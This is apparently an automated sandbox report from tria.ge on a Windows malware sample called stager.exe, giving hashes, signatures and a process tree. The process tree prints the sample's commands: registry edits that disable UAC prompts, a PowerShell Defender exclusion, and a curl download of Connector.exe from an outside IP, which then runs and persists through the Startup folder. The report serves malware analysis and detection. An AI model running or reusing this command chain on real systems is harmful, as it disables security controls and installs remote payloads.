Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
152s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
19/07/2023, 13:01
Static task
static1
Behavioral task
behavioral1
Sample
stager.exe
Resource
win7-20230712-en
General
-
Target
stager.exe
-
Size
1.9MB
-
MD5
4ed2a8948a165b72025d5868a31a34c8
-
SHA1
b25b9db66eefe9418bb398a8a5ffe4aebb7d4ff8
-
SHA256
79d1a9ec049f598528e505aa71fdd68f01f7abcd8cb29c1e54ba018d239ae282
-
SHA512
64411bb2f3510f26114d809409dd9af29238fb1c43ee005c08c3b00826be0bce0230ad26afc786961b659d8cc470f59ed12108b4a11056b702a516330bbec380
-
SSDEEP
24576:GXjaqCL0DG3EZJOHVXGGUIHjNGxmKg7xf:GXjaADG3EWVd
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" reg.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\International\Geo\Nation stager.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Connector.lnk stager.exe -
Executes dropped EXE 1 IoCs
pid Process 4636 Connector.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ stager.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1268 powershell.exe 1268 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1268 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4780 wrote to memory of 1148 4780 stager.exe 86 PID 4780 wrote to memory of 1148 4780 stager.exe 86 PID 1148 wrote to memory of 3020 1148 cmd.exe 87 PID 1148 wrote to memory of 3020 1148 cmd.exe 87 PID 4780 wrote to memory of 1088 4780 stager.exe 88 PID 4780 wrote to memory of 1088 4780 stager.exe 88 PID 1088 wrote to memory of 556 1088 cmd.exe 89 PID 1088 wrote to memory of 556 1088 cmd.exe 89 PID 4780 wrote to memory of 3572 4780 stager.exe 91 PID 4780 wrote to memory of 3572 4780 stager.exe 91 PID 4780 wrote to memory of 3900 4780 stager.exe 92 PID 4780 wrote to memory of 3900 4780 stager.exe 92 PID 3900 wrote to memory of 1268 3900 cmd.exe 93 PID 3900 wrote to memory of 1268 3900 cmd.exe 93 PID 4780 wrote to memory of 988 4780 stager.exe 94 PID 4780 wrote to memory of 988 4780 stager.exe 94 PID 988 wrote to memory of 4796 988 cmd.exe 95 PID 988 wrote to memory of 4796 988 cmd.exe 95 PID 4780 wrote to memory of 4636 4780 stager.exe 98 PID 4780 wrote to memory of 4636 4780 stager.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\stager.exe"C:\Users\Admin\AppData\Local\Temp\stager.exe"1⤵
- Checks computer location settings
- Drops startup file
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
PID:3020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f3⤵
- UAC bypass
PID:556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "C:\MicS"2⤵PID:3572
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\MicS"2⤵
- Suspicious use of WriteProcessMemory
PID:3900 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\MicS"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1268
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -o "C:\MicS\Connector.exe" "http://13.50.250.113/Connector.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Windows\system32\curl.execurl -o "C:\MicS\Connector.exe" "http://13.50.250.113/Connector.exe"3⤵PID:4796
-
-
-
C:\MicS\Connector.exe"C:\MicS\Connector.exe"2⤵
- Executes dropped EXE
PID:4636
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.9MB
MD5d4f8be5303fc3c96545a4d259fe884c1
SHA1251a4e6299c6b2f577ad25d6de765cca0e097750
SHA25621c79c8aba3fd51e5c73f4d0b080763c8e3eef8f450df99c3686d3d0e21e18c0
SHA5129a7212936cdec950db0ffb58767109df0142317378437a4c7d96b9b4a7c9d6613ae573e1689a986233fa4a5d86e51b00443c2afe57ef0f91fa0e59753f200658
-
Filesize
1.9MB
MD5d4f8be5303fc3c96545a4d259fe884c1
SHA1251a4e6299c6b2f577ad25d6de765cca0e097750
SHA25621c79c8aba3fd51e5c73f4d0b080763c8e3eef8f450df99c3686d3d0e21e18c0
SHA5129a7212936cdec950db0ffb58767109df0142317378437a4c7d96b9b4a7c9d6613ae573e1689a986233fa4a5d86e51b00443c2afe57ef0f91fa0e59753f200658
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
659B
MD502e8749bd66771e8721ca6562582b593
SHA1cfedc0fc7bc4f0922fdacba822d36a0d556702ea
SHA2565331a73d6b6a63561924907c1887ee349409698e30e068450dbde47803d08f67
SHA512acd391d49db843e8fb204fd657ed6b11617d44b379f1cef1f43dc48ebe6ae4ea7109c2716e485420aa55955578dbd6edd35a8a0cb84b44660afa0f374f893a73